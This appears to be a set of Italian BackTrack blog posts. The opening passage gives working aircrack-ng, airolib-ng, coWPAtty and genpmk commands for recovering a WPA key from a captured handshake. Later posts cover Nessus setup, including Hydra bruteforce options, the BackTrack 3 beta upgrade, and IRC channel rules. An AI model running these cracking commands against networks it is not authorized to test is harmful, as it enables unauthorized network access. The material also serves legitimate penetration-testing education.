Non ci resta che recuperare la chiave WPA con Aircrack-ng usando il database crerato da Airolib-ng al posto della sola wordlist:
——————————

aircrack-ng -r wpaTestDB handshake-01.cap
——————————
airolib-crack.jpg
———————————————————————-
Ancora una volta -=Xpoitz=- ha spiegato tutto producendo un’ottimo video, trovate il link leggendo questo post del forum di Remote-Exploit.org
[COWPATTY]
Non resta che provare con un’altro strumento a nostra disposizione, coWPAtty. In BT3 per lanciare coWPAtty 4.0, quello usato da theprez98 in questo post che si trova su Remote-Exploit.org, dovete andare nella cartella /pentest/wireless/cowpatty-4.0/ e lanciarlo da qua dentro con ./cowpatty.
Anche con coWPAtty possiamo utilizzare metodi diversi, incominciamo sviluppando l’hash della password in tempo reale durante il cracking:
———————–
./cowpatty -f junk -r handshake-01.cap -s “trinacria”
———————–

cowpatty-crack.jpg
oppure possiamo precalcolare l’hash con genpmk e poi utilizzarlo con coWPAtty:
—————–
genpmk -f junk -d hashGenpmk -s “trinacria”
—————–
cowpatty-genpmk.jpg

e quindi recuperare la password fornendo in input l’hash, l’hanshake e l’ESSID della rete:
——————
./cowpatty -d hashGenpmk -r handshake-01.cap -s “trinacria”
——————

cowpatty-genpmk-crack.jpg
———————————————————————-
Seguendo il post di shamanvirtuel ho scoperto che Airolib-ng ha tra le vari funzioni anche quella di esportare l’hash gia computato di un determinato ESSID con la nostra wordlist in un file che possa essere letto da coWPAtty, in questo modo abbiamo la possibilità di gestire un database di hash con Airolib-ng e utilizzare coWPAtty per recuperare la chiave; il comando per esportare solo gli hash di un determinato ESSID e password è:
——————–
airolib-ng wpaTestDB export cowpatty “trinacria” airoexport
——————–

come vedete specifichiamo il database su quale lavorare (wpaTestDB) l’ESSID da esportare (trinacria) e il nome del file che andremo a generare (airoexport). Adesso con coWPAtty possiamo recuperare la nostra chiave:
——————–
./cowpatty -d airoexport -s “trinacria” -r hanshake-o1.cap
——————–
[AGGIORNARE “wpaTestDB”]
Aggiornare il database con Airolib-ng è possibile, in questo modo potete aggiungere di volta in volta password o essid al vostro database senza perdere cio che avevate già computato prima.
Verifichiamo lo stato del nostro database:
————————–
airolib-ng wpaTestDB stats
————————–

airolib-stats.jpg
in questo modo avremo per output l’elenco degli ESSID inseriti (trinacria) e la percentuale di PMK generate con le password inserite (100.0). Ora aggiungiamo un nuovo ESSID al database, quindi cancelliamo il file essid.txt creato prima e creiamone un’altro con all’interno l’ESSID da aggiungere (possiamo aggiungerne anche più di uno alla volta):
——————-
airolib-ng wpaTestDB import ascii essid essid.txt
——————-
Adesso proviamo a verificare ancora lo stato del nostro database e guardiamo il risultato:

airolib-stats02.jpg
Come potete vedere l’ESSID è stato aggiunto (essidAGGIUNTO) ma ancora non è stato computata nessuna PMK con questo ESSID (0.0); appunto ora comptiamo le chiavi con l’opzione batch e verifichiamo lo stato del database:

airolib-stats03.jpg
Adesso il database è computato al 100%!!
Cosa utilizzare di ciò che ho scritto e in che circostanza penso si possa capire solo con la pratica, io non mi sono fatto un’idea generale. Per farsi un’idea migliore bisogna fare più prove e porgere attenzione alla tempistica di ogni passaggio, magari provando wordlist di dimensioni diverse, tanto sperimentare non fa mai male! 🙂 🙂
Per concludere vi ricordo che dovete sperimentare tutto quello che ho scritto su una rete di vostra proprietà, non intendo prendermi nessuna responsabilità dell’uso che farete di quanto descritto.

Installazione e configurazione di Nessus in BackTrack

nessus.jpg

Ciao a tutti,

eccomi , e anche dopo brevissimo tempo , a scrivere un altro tutorial , e lo faccio sull’ installazione e la configurazione in backtrack di uno strumento importantissimo , il Nessus.

Ma cos’é il Nessus?

Il Nessus è un programma per lo scanning di vulnerabilità , completo , sicuro e userfriendly , e vi assicuro che è tra i migliori in circolazione. A mio avviso il Nessus è uno strumento unico , a cui un user non può rinunciare , presenta una caratteristica di lavoro non facile da trovare su altri tool , e cioé la possibilità di avere a disposizione un tool che ci faccia lavorare in stile client – server senza alcun tipo di problema Il server può risiedere sul proprio pc in localhost oppure in remoto , e non credo ci siano molti strumenti simili oggi in circolazione.

Il Nessus è un prodotto della Tenable , ed è disponibile oltre che per la nostra backtrack , (naturalmente parlo del fomato pacchettizzato per la Slackware-12.0) , tramite un processo determinato che ora descriverò , anche per altre piattaforme , da Windows a BSD ed altri.

Parlare del Nessus come un semplice scanner è sbagliato , perché il Nessus tramite tutti i suoi plugin , si parla dell’ ordine delle migliaia , e le sue funzioni , è un vero e proprio strumento indispensabile per coloro che lavorano nel campo della sicurezza , e non è facilmente sostituibile.

Il Nessus esegue uno scanning delle vulnerabilità , servendo l’utente con delle informazioni dettagliate a riguardo delle vulnerabilità trovate durante lo scanning avvalendosi anche di link esterni sempre aggiornati per le informazioni , evidenziando e classificando le vulnerabilità una ad una , ed è per questo che non può essere definito solo uno scanner , e che non può mancare in una distro al top come backtrack.

Purtroppo i problemi di licenza non possono essere discussi da noi , ma solo giudicati , ed una casa come la Tenable che non usa la licenza GPL-2 , impedendo al remote-exploit di inserire il Nessus in backtrack-3beta , a mio modestissimo parere , ci perde qualcosina , anche se il Nessus , come tool , non ha bisogno di altri commenti.

Nella versione 2 di backtrack , ricordo che dovetti registrarmi alla Tenable , ed ottenere un serial number , questa volta non sono sicuro che serva ancora , ma io ce l’ho , fossi in voi , mi registrerei , non ci costa nulla d’altronde , e in più sul suto di Tenable Network ci sono delle guide ed un DEMO , a cui in caso di necessità o anche solo per approfondire la cosa , possiamo sempre far riferimento.

Già in qualche articolo precedente ho fatto presente la mia totale approvazione nell’ inserire in backtrack3beta il nuovo server grafico Xorg , cosa che ci permette di avere tutti i programmi che possono attualmente girare su Slackware-12.0 , e al contrario della versione 2 della backtrack , con la quale per avere il Nessus ricordo che dovetti compilarmi tutti e 5 i pacchetti con il 30/40% delle librerie mancanti , questa volta possiamo prenderci benissimo i pacchetti Slackware-12.0 direttamente dai repository di Slacky.eu , i miei preferiti.

La prima cosa da fare quindi per avere il Nessus correttamente installato sulla nostra macchina è andarci a scaricare i seguenti pacchetti , che potete lasciare benissimo nella vostra /root.

libnasl-2.2.10-i486-1sl.tgzslackware_logo.gif

nessus-client-1.0.2-i486-1sl.tgz

nessus-core-2.2.10-i486-1sl.tgz

nessus-libraries-2.2.10-i486-1sl.tgz

nessus-plugins-2.2.10-i486-1sl.tgz

Una volta che tutti i pacchetti sono stati scaricati nella vostra /root , directory di download di default in backtrack , andate in konsole e digitate il comando:

installpkg *.tgz

In questo modo tutti i pacchetti nell’ ordine di sistema verranno installati nella vostra macchina , e alla fine avrete il vostro Nessus in attesa di configurazione.

Naturalmente dovete stare attenti a non avere nessun altro pacchetto con estensione *.tgz nella vostra /root , altrimenti verrà installato o reinstallato , quindi se ne avete qualcuno come residuo , spostatevelo in un’ altra directory.

Ora , una volta che abbiamo il nostro Nessus , vediamo come poterlo configurare.

Una volta aperto il Nessus si presenta con una buona interfaccia grafica , e subito ci viene chiesto di eseguire un login , che va eseguito inserendovi i propri dati. Per inserire questi dati però è necessario crearsi degli utenti da aggiungere alla lista di Nessus , e gli user per Nessus vanno creati tramite terminale con il comando:

nessus-adduser

Una volta eseguito il comando si seguono le indicazioni del sistema , in backtrack essendo utente root non si deve fare altro che premere invio appena settati user e password , e l’utente abilitato ad eseguire il login per il Nessus è stato creato.

Ora creiamo una certificazione per Nessus , che praticamente è solo un documento che abilita Nessus in connessione SSL , che anche se può sembrare strano , date le domande private , sono informazioni che non vengono rivelate a nessuno ma risiedono nel database di Nessus che si trova sulla nostra macchina , e precisamene in questa posizione:

Nessus Server :
Certificate = /usr/com/nessus/CA/servercert.pem
Private key = /usr/var/nessus/CA/serverkey.pem

risposta che vi viene data in konsole alla fine della configurazione/creazione del certificato , quindi potete stare tranquilli…

il comando per la creazione del certificato è:

nessus-mkcert

Ora dobbiamo passare alla configurazione finale di Nessus , e cominciamo con il fargli caricare tutti i plugin , ( sono 15020 ) , dando da konsole il comando:

nessusd -D
aspettiamo che Nessus si carichi i propri plugin e diamo da konsole il comando per farlo partire:

nessus

(Anche se installato correttamente il Nessus , è possibile che non si sia inserita nel menu di KDE , basta lanciarlo da konsole con il semplice comendo nessus).

ccc.png

Come potete vedere sono “loggato”, ossia sono riuscito , ad avviare da utente root (root solo per il nome) , il Nessus , che al primo login subito si è preso altri 50/60 secondi per ripetersi la scansione dei plugin.

Una volta eseguito il login ci verrà mostrato il certificato , e all’ accettazione dello stesso possiamo partire con il nostro Nessus. Ricordo che è meglio fare in modo che ad ogni avvio Nessus aggiorni tutti i plugins , per migliorare lo scanning ed avere sempre a propria disposizione tutti gli strumenti sempre aggiornati.

—–>Nella prima tabella , Nessusd Host , abbiamo , come specificato all’ inizio dell’articolo , la possibilità di inserire un host remoto , oppure come è la scelta di default , di lasciare l’ host locale per avviare lo scanning dalla nostra postazione.

—–>Nella seconda tabella invece , quella dei Plugins , possiamo selezionare tutti quei plugins che a noi più interessano , cercando di tralasciare tutti quelli che invece sono di troppo , non dimentichiamo che oltre a risparmiare tempo , un minor numero di plugins , nel limite del possibile , è necessario perché nel Nessus sono inseriti dei plugins che durante la scansione delle vulnerabilità su di un determinato host possono creare dei seri problemi all’ host stesso , non ultimo un Denial Of Service o anche un crash del sistema.

—–>La terza tabella Credential , serve per fare il setting appunto delle credenziali , e cioé immettere tutti quei dati che se in nostro possesso , possono servirci per l’ingresso ad esempio in un determinato database , e possono essere immessi come dati per il protocollo SSL , Kerberos , Samba eccetera…

—–>La quarta tabella invece riguarda lo Scan Options , ovvero le opzioni di scanning , di cui noi possiamo servirci in vari modi a seconda delle nostre necessità , possiamo inserire una sola porta da scannerizzare inserendo il numero della porta , oppure possiamo inserire una serie di porte separandole tra loro con una virgola ,(–>20,80) , se invece le porte sono diverse e possono essere collocate inserie , ovvero con numero ricorsivo , possiamo inserire la serie di porte separando il numero della prima porta e l’ ultima con un trattino (–> 20-80) , possiamo inserire la PATH da scannerizzare , se diversa da quella di default /cgi-bin:/scripts , possiamo inserire inoltre il metodo di scanning, infatti nella parte bassa della finestra possiamo inserire delle opzioni che ci possono permettere di usare l’ amap , di effettuare o meno dei ping sull’ host remoto , e tutte queste opzioni sono utilizzabili singolarmente , (e anche settando un tempo di timeout) , essendo tutte parte dei plugins.

—–>La quinta tabella è dedicata invece al Target , l’ obbiettivo da scannerizzare , che può essere immesso come IP oppure come nome dell’ host , nel caso in cui dovessimo fare un lavoro più complesso quale ad esempio lo scanning di una rete intera basta inserire tutti gli indirizzi-IP/nomi-host , separandoli oppure aggregandoli come per le porte viste in precedenza , tramite uno slash “/” o una virgola , e.g.: 192.168.122/188 per un intero network oppure 192.168.122.9,192.168.1.7 per due target.

– —->La sesta tabella definisce invece le Regole da applicare all’ user creato prima con il comando dato tramite konsole.

—–>La settima riguarda le Tecniche di scanning , il tuning , e altre opzioni , come quella di poter fare un detecting del firewall , lo scanning delle porte in ordine casuale o meno (random-mode) , la possibilità di un eventuale congestione del sistema target , e anche opzioni da configurare per i tool da adoperare se selezionati nelle tabelle precedenti come l’ amap , a cui possiamo dare l’ abilitazione o meno del SSL , dell’ RPC o altro. Importante in questa tabella da configurare è anche l’ eventualità , sempre e solo se inserita , del HYDRA , che richiede logicamente altrettante configurazioni oppure anche dei files *.txt contenenti dizionari per l’ azione di Bruteforce.

—–>L’ottava e La nona tabella riguardano rispettivamente la nostra volontà o meno di salvare i dati eventualmente ricevuti , e i credit’s della Tenable , a cui vanno i nostri complimenti , magari con la speranza di assunzione di una nuova licenza che possa permetterci di avere Nessus nella backtrack-3final , ma non voglio dilungarmi a riguardo , del resto le licenze sono fatte apposta per non essere sottoposte a giudizio , quindi se la Tenable ha deciso di non aderire alla GPL-2 , noi non possiamo che augurarci solo un cambiamento

Come possiamo vedere da tutte le opzioni e dalla possibilità di utilizzare interi tool all’ interno dello stesso Nessus , stiamo parlando di un prodotto davvero unico , e che se configurato correttamente può diventare uno strumento a cui non si può fare a meno.

ciao a tutti e alla prossima.

BackTrack “tutto dalla 2-final alla 3-beta”

bt.png

ciao a tutti,

eccoci finalmente , dopo giorni e giorni di prove e test , a fare il nostro aggiornamento di versione , in quest’articolo proverò a descrivere le differenze di installazione e di uso che ho riscontrato tra la backtrack 2 , e la backtrack 3-beta.

Questo e l articolo di UPdate , ma all uscita della BackTrack/3final , verra fatto un aggiornamento di tutti gli articoli , dall installazione su Usb a quella su Hardisk , questo tutorial lo terremo quindi come metodo provvisorio per la BackTrack/3beta… …se questo è un UPdate , faremo un UPgrade :P.

Naturalmente , come sempre dico , se qualcuno ha dei suggerimenti dei reclami , delle particolarità da aggiungere agli articoli che io o altri del blog facciamo , non deve fare altro che scrivermi una mail chiedendomela in un messaggio o e se chiedete che resti privato , sarà fatto.
***************************

bt3beta.png
****************************
Torniamo a noi , e iniziamo l’ articolo con la descrizione dei vari tipi di installazione della nostra backtrack 3-beta.
L’installazione di backtrack 3beta , (bt3) , è naturalmente identica all’ installazione della versione precedente , allego un immagine per far capire meglio la cosa….
*******************

hdinstallbt3.png
************************
**********
(l’ultima parte tagliata era il mount di /dev/sda4 in /mnt/backtrack)
*******************************************
come possiamo vedere avendo un 2 hardisk , non ho fato altro che fare tutto ciò che è anche descritto nella guida che scrissi tempo fà per la vecchia versione di BT che potete trovare quì
Nell’immagine sotto invece possiamo notare il diverso installer , che anche se descritto come “not tested , a me ha fatto il suo dovere , e direi anche meglio dell’installer vecchio. 😉
**********
*****************************

installerbt3.png
***************
**********************************
come potete vedere questa è la soluzione che io ho adottato per il semplice fatto che faccio partire backtrack con il GRUB di Debian , e che ho modificato nel modo descritto sempre nella guida riportata sopra. Molti utenti però usano BT3 come sistema operativo da associare a WindowsXP , o al Vista , in questo caso non è difficile lo stesso , basterà configurare il LILO di BT3 , aprendo il file “lilo.conf” che si trova nella directory “/etc” con il comando:
kate /etc/lilo.conf
ed aggiungere le righe che vi riporto quì sotto.

other=/dev/sda*

label=WinXPpro

dove logicamente l’asterisco è il numero della vostra partizione e stando attenti a mettere la lettera s oppure la lettera h a seconda se avete un hardisk serialATA oppure no.
Se avete BT3 e windows e volete far partire windows con il LILO di BT3 come appena descritto , ricordatevi però che le opzioni nell’ instller di BT3 cambiano , e dovrete mettere il device dove la BT3 dovrà scrivere il suo MBR , dove appunto c’é scritto “Write New MBR (lilo.mbr) to:” ad esempio , anche se non è il mio caso , /dev/sda
per chi ha il dualboot con qualsiasi altra distro….sempre la guida riportata dal link sopra.
Ora passiamo all’ installazione su chiave usb
Come per la versione precedente l’installazione su usb , non cambia… e quindi vi rimando alla vecchia guida a questo link.
Sia che vogliate realizzare l’installazione da Windows sia da ambiente UNIX /LINUX
Ora…quello che cambia per quanto riguarda coloro che come me , anche se io uso backtrack anche installata , usano la backtrack da usb , è il LiveChange .
Perché?
Perhé mentre l’ altra versione aveva la possibilità di portarsi i cambiamenti tramite la configurazione di files come syslinux.cfg
e il bootinst.bat , e poi lanciare il file bootinst.bat se in Windows oppure bootinst.sh da shell se in Linux , adesso non ce n’é più bisogno , perché la BT3 ha uno script di avvio che ci permette di selezionare i vari ingressi , tra cui anche quello con il LiveChange
L’unica operazione da fare è portare i cambiamenti effettuati nella partizione dei moduli della chiavetta usb…… ma facciamo un esempio:
se noi abbiamo la BT3 su una chiave usb montata dal sistema in /mnt/sdb1
una volta entrati in BT3 ed aver fatto tutti i nostri cambiamenti dovremmo realizzare un modulo che li raccolga tutti , e lo dovremo fare con il comando inverso che invece useremo in caso di installazione di programmi in moduli *.lzm con questo comando:
*
dir2lzm "/mnt/live/memory/changes" "/mnt/sdb1/BT3/modules/changes.lzm"
Praticamente con questo comando creiamo il modulo con tutti i nostri changes e li mettiamo nella cartella in cui BT3 detiene i suoi moduli , per essere sicuri che i nostri changes non siano troppo grandi di dimensione per la nostra chiavetta usb , possiamo copiarli in una directory diversa per poi misurarne le dimensioni e eventualmente riporli nella directory dei moduli dell’ usb , in questo modo avremo i nostri cambiamenti salvati e ad ogni avvio la BT3 si mostrerà sempre con gli ultimi cambiamenti fatti , stiamo però attenti a non fare l’ operazione per una seconda volta altrimenti si può rischiare di fare la sovrascrittura.
Se volete effettuare i cambiamenti anche dopo aver fatto il vostro primo change , dovete farlo chiamando i changes in maniera ricorsiva , se il primo , come nel nostro caso , è stato changes.lzm , al secondo dategli il nome changes1.lzm , e così via…
Non ho provato personalmente ma credo che l’operazione in questo modo potrebbe essere effettuata anche d HDisk esterno , sempre però se reso avviabile con le operazioni precedentemente descritte.
Descritte le operazioni di installazione , che variano ben poco rispetto alla versione precedente , passiamo ad altre cosette che cambiano BT2.
Cambio di versione….cambio di repository.
Nelle guide scorse , sempre riguardanti la BT2 , vi avevo descritto come aggiungere i repository al gestore slapt-get , e poter così installare comodamente i nostri programmi da riga di comando…. ora , con l’ aggiunta in BT3 del gestore di pacchetti grafico Gslapt-pakage-manager , è ancora più comodo e facile installare pacchetti , basta avere logicamente i repository giusti.
I repository di default inseriti in BT3 , per ora , non vanno proprio bene…. ma è una beta , ed è stata tirata fuori proprio per fare in modo che i Bug , se di bug possiamo parlare , vengno corretti e fare in modo che la 3 final risulti il più stabile e funzionale possibile , quindi anche se i repository non vanno proprio alla grande ci basta modificarli , aprendo con l’ editor di testi preferito come kate il file slapt-getrc che si trova in /etc e dando da konsole il seguente comando:
kate /etc/slapt-get/slapt-getrc
Ed al file di testo che si aprirà , senza cancellarli , commentiamo tutti i repository presenti , (il commento non è altro che un cancelletto “#” posto all’ inizio della riga che permette al sistema di saltarla e non leggerla ) ,in modo da poterli riattivare in un futuro speriamo non lontano , ed aggiungiamo alla fine la seguente riga:
SOURCE=http://linuxpackages.inode.at/Slackware-12.0/

t

come potete vedere dall’ immagine , (anche se ho usato l’ editor nano direttamente da konsole) , io stesso ho aggiunto tutti i miei soliti repository ma li ho commentati tutti ed ho lasciato i repo di linuxpakage che sembrano andare alla grande.
************************
************************
r.png
(Se l’immagine si vede ristretta è perché altrimenti non ci entrava , ma voi cliccateci se volete i repository che ho inserito io….)
***************************************
**********************************
Appena fatto date un slapt-get –update , e finito l’ UPdate se volete fare l’ UPgrade dei vostri pacchetti date anche un slapt-get –upgrade ed avete aggiornato tutto il vostro sistema , se avete problemi con l’ md5 , date il comando per evitare il controllo , slapt-get –upgrade –no-md5
Naturalmente questa non è una buona risoluzione del problema , ma solo un temporaneo rifugio , se l’ errore persiste , gli amici di BackTrack-fr.net , consigliano di fare l’ UPgrade del PakageManager , e in questo modo i problemi dovrebbero scomparire , anche se io la lista dei miei repository fin’ ora non ho mai potuto averla senza i commenti “#” , ma non dimentichiamo la questione chiave di tutto ciò é che è pursempre una beta release.
io comunque l’ aggiornamento l’ ho fatto ugulmente , ed è andato tutto bene , quindi grazie a S3th e a tutto il team e gli user di backtrack-fr.net , chi volesse il pacchetto lo trovate quì.
Lo trovate in *.tar.gz quindi da Shell , posizionatevi nella directory dell’ archivio e date:
tar xvfz nomedelpacchetto.tar.gz
cd /nome_della_cartella_estratta_dal_pacchetto
./configure
make
make install
Altre che hanno fatto grande il cambiamento nella versione attuale rispetto alla precedente , è l’immissione del nuovo server grafico Xorg che , e scusate se è poco , autoconfigura con i driver mesa tutte le schede video o quasi , ma io non visto lamentele a riguado , infatti dal boot già si può scegliere addirittura se entrare in modalità grafica con Compiz.
snapshotd1.png snapshot2.png snapshotd2.pngsnapshotd3.png
, e questo è valido per le schede video nVidia , intel e ATI come descritto del resto nel Wiki
Per l’installazione su HDisk le cose però cambiano , infatti per coloro che hanno le schede nVidia , possono tranquillamente installare un pacchetto in modulo *.lzm , (che è inserito in BT3-beta in versione usb , nel LiveCD non c’é ) , e avere così Compiz sull’ HDisk , questo per le schede nVidia.
Per le schede ATI/Intel è diverso però , viene consigliato di installare sempre il driver della propria scheda grafica , ma è un driver che non andrà ad interagire con i mesa , ma con xorg.conf , quindi fate voi.
Io ho provato in tutti i modi ad inserire sull’ installazione su HDisk Beryl , a mio avviso molto più comodo , funzionale , semplice e leggero di Compiz , ma niente non ne vuole sapere , questo sul portatile con chipset grafico Intel anche aggiornato da repository git , naturalmente sul fisso è totalmente diverso perché ho montato una scheda nVidia da un paio di mesi e va alla grande
Coloro che hanno installato la BT , e che possiedono un laptop DELL , ed hanno un chipset grafico nVidia , non hanno alcun problema , se vedete che il cubo da problemi di stabilità , oppure vi mostra le classiche facce bianche o fatica a generare le decorazioni delle finestre , andate a modificare xorg.conf , quindi con una shell apritevi il file con il comando:
kate /etc/X11/xorg.conf
ed apportatevi le seguenti modifiche:
nvidia-xconfig –add-argb-glx-visuals
nvidia-xconfig -d 24
Ctrl + Alt + Backspace
**************************
Per tutti coloro che vogliono avere Compiz-Fusion in backtrack 3-beta , ed hanno come me sul laptop una scheda video Intel , (la mia è una Intel950-GMA per la precisione) , consiglio vivamente di fare l’installazione da usb , facendo tutti i passaggi descritti nella guida e far partire l’installer di backtrack da usb , in questo modo il sistema si porta il boot su hardisk con i drivers mesa e non usa xorg.conf , è solo un metodo per aggirare , io adesso oltre all’ usb , ho anche l’ installazione su HDisk e faccio girare Compiz-Fusion con una scheda Intel , ma con il driver nVidia incluso nella usb con Livechanges…..sono stupidaggini sì , ma chi vuole credo che possa farlo anche con schede ATI , se praticamente Compi-Fusion gira bene da usb , in questo modo andrà anche con installazione su HDisk.
Ricordatevi naturalmente di mettere tutto a posto con un UPdate ed un UPgrade appena eseguita l’ installazione e dovreste essere a posto.
********************
[edit]
Scrivo quest’ edit per segnalare la possibilità , per coloro che lo desiderassero , di installarsi beryl invece che compiz , seguite i repository segnalati in questa guida , ma invece di entrare nella categoria dei repository di slacky.eu , dedicata alla slackware , entrare e scaricatevi beryl , dai repository dedicati alla Gnome Slacky , io li sto utilizzando senza alcun problema
***
New edit , per il nuovo link al download del file cubez.lzm , postato anche da Dr_Green sul forum di remote-exploit , e hostato su mediafire.com.
[/edit]
***************************
Rimane il fatto che ho sempre avuto BT su chiavetta usb , e questa volta i LiveChanges , sono molto più comodi per i professionisti , e questo è l’importante , ma coloro che avevano la chiavetta usb di boot con partizione su HDisk fisso , ora è un pò diversa la cosa , ma è una security-distro , non dimentichiamolo mai , è la più figa ed efficente contemporaneamente , ma la portabilità per una distro come la backtrack , è troppo fondamentale.
Novità molto più importante è che praticamente è stato allargato a dismisura il campo di compatibilità con moltissime schede Wireless , e tutt’ ora sono davvero poche le schede non supportate , ma che comunque possono essere regolate con i drivers reperibili in rete.
Una cosa che tengo a dire è che grazie agli amici WiFi-ITA , abbiamo anche uno script che ci configura il kismet e che può essere scaricato da quì , appena scaricato sul Desktop andate in konsole date il comando:
cp /root/Desktop/start-kismet-ng /usr/bin/start-kismet-ng
questo per copiarlo nella directory /usr/bin e poi potete lanciarlo da Shell oppure , più comodo , direttamente dal menù di BT3-beta , quindi:
KdeMenuStart->Backtrack->RadioNetworkAnalisys->80211->Analiser->Kismet
Per tutto il resto , i tool sono alla versione più recente , e se le cose continuano così la backtrack rimarrà la security-distro più completa ancora per molto tempo.
L’installazione dei programmi fin’ ora è andata in maniera un pochino irregolare , ma non dimentichiamo che abbiamo a che fare con una beta-release , infatti non tutti i programmi per la Slackware-12 vanno in porto , pochissimi per quanto mi riguarda , ma se backtrack ha una fortuna d’ altro canto è che può usufruire anche di pacchetti Slax , e fin’ora o da una parte o dall’ altra , ho sempre risolto in maniera ottimale , non a caso ho installato i classici tool di cui ho bisogno da Amarok all’ intera suite OpenOffice.org , da Wink al solito Thunderbird , tutti i tool di cui praticamente non posso fare a meno per il resto c’é backtrack 😉
Per coloro che invece usano la BT3 in Virtual-mode valgono le stesse guide che scrissi per la versione 2 che potete trovare a questa pagine , sia per il VirtualBox -INNOTEK– sia per VMware
Per me già da tempo è finito il voler virtualizzare BT , oramai virtualizzo altri O.S. in BT , tramite la stessa VMware , installandola e compilandola da archivio prelevabile , dovrebbe essere previa registrazione , da questa pagina.
Oramai uso backtrack come primo O.S. , e sinceramente non credo che da questa beta , ma soprattutto dalla versione 3final , alla backtrack mancherà qualcosa per poter essere pargonata ad ogni altro sistema operativo al mondo.
Gli sviluppatori stanno lavorando molto e duramente , per questo tutti coloro che vogliono , in qualsiasi momento troveranno in questo blog il tasto “donate” , che non è per me , ne per nessun altro membro del blog , ma per gli sviluppatori di backtrack , il tasto donate vi porterà direttamente sul sito di donazione di remote-exploit.org , con un gesto del genere ci faremo come comunità , una bella figura.
A tutto il team di remote-exploit.org , ed a tutto il forum va il nostro grande riconoscimento , e speriamo come ho appena detto , anche sotto forma economica.

Chan e Mailinglist del back|track~blog

irc
Ciao a tutti!
Abbiamo un canale di discussione su Azzurra, il canale è #backtrack-it
Potete trovarci e trovarvi per discutere della distro n°1 del settore Pen-Testing!
Saremo molto più presenti la sera che in giornata (di giorno ci si guadagna la pagnotta….) ma il canale è sempre aperto e ad accesso libero!!
Per entrare potete usare xChat, se state usando BackTrack, o qualsiasi altro client IRC (es. mIRC) e connettervi al server Azzurra. Una volta connessi scrivete nella pagina principale
—————————–
/JOIN #backtrack-it
—————————–
Vi ricordo che per poter inziare discussioni private dovete leggere le F.A.Q. , rispettarle e registrare il vostro nick sul server, trovate tutte le istruzioni qui!
Spero di trovarvi tutti li,
ciauz!
***
 
faq_intro_01.jpg
F. A. Q.
***
In ogni luogo che si rispetti é giusto seguire delle regole , anche nel chan italiano dedicato alla BackTrack ,ci sono delle regole , e tutti sono tenuti a leggerle e a rispettarle , un buon rapporto inizia sempre dal rispeto reciproco , ecco quindi a voi le regole da rispettare:
***
—> La BackTrack non è una distro userfriendly , quindi chiunque di voi venga dal mondo M$-Windows e voglia avvicinarsi alla backtrack , prenda in considerazione l’ idea di farsi l’ esperienza con distro GNU/Liniux più adeguate alla propria persona.
—> Domande riguardanti hacking illegale e richieste fuori dalle regole , non verranno tenute in considerazione , e chi le fà verrà automaticamente bannato dal canale.
—> Siate educati.
Ricordate sempre che:
—> DOMANDARE È LECITO,
—> RISPONDERE È CORTESIA!
—> Se usate la BackTrack in virtualmode , ricordate che dovete controllare il vostro HardWare , perché le virtualmachine sono fatte per provare gli O.S. sapendo bene se il nostro hardware è supportato o meno.
—> Prima di venire nel canale a fare domande , fatevi le vostre ricerche su GOOGLE , noi siamo a vostra disposizione , ma non siamo decine e se ognuno di voi fà domande di tutti i tipi passiamo giornate intere a darvi solo risposte senza neanche più poter lavorare.
—> Noi ce la metteremo tutta , ma se non vi vedete rispondere prendete pure altre strade , non siamo degli DEI.
—> Se non vi vedete rispondere non parlate male del chan… …ricordate che ognuno di noi ha i propri impegni e nel limite del possibile faremo del nostro meglio.
—> Se vedete che nel chan siamo pochi , non demoralizzate le persone , il nostro non è un chan di hacking generico , ma è un chan di esclusivo supporto ad una distro che per noi è importante , ma che sicuramente non richiama utenza come ad esempio ubuntu-linux.
—> Non fatevi linkare sempre le guide al «back|track~blog o al forum di remote-exploit , prima di domandare fate una ricerca sul blog , se non trovate nulla allora fate la vostra domanda nel chan e aspettate che vi venga data la risposta.
—> Tenete presente che siamo solo in due , ed entrambe facciamo questo solo per la creazione e la crescità di una comunità , non guadagniamo nulla in denaro.
—> Chi non si atiene alle seguenti regole verrà automaticamente BANNATO dal chan.
—> Cé oltre al nostro blog in italiano , anche il WIKI uffuciale di BackTrack , il link è sempre presente nel blog , quindi se non ricevete risposta recatevi nel Wiki ufficiale di remote-exploit.org ci sono tutorial e tutto quello che serve per il corretto uso della nostra distro.
—> Se venite contattati in privato da un operatore non parlate più nel chan con l’ operatore stesso , altrimenti si rischia di fare solo confusione.
—> Se vedete un solo operatore presente sul canale , aspettate che si liberi da altre richieste , poi fate la vostra domanda.
—> Quando esponete il vostro problema siate il più precisi possibili , se avete un problema ad installare un programma ad esempio , lanciatelo da konsole e , dopo averlo detto nel chan , postate il contenuto dell’ errore che la konsole vi riporta.
—> Ogni volta che si desidera chiedere cose che non riguardano lo stretto uso della backtrack , chiedetelo in privato.
—> Domande riguardanti la scoperta di indirizzi privati o di cose che invadono la privacy di altri utenti non sono ammesse assolutamente.
—>Non venite nel chan a fare i guru , ai troll noi non diamo retta.
—> Siate discreti ed educati cercando di darci una mano e non di crearci confuzione… ….GRAZIE.
***
logo.png
***
L’ indirizzo della nostra mailinglist è: backtrack-it@googlegroups.com
Useremo il gruppo solo come mailinglist comunque abbiamo il chan per il resto , e presto apriremo un forum.
Ciao a tutti e buona permanenza.
All the best…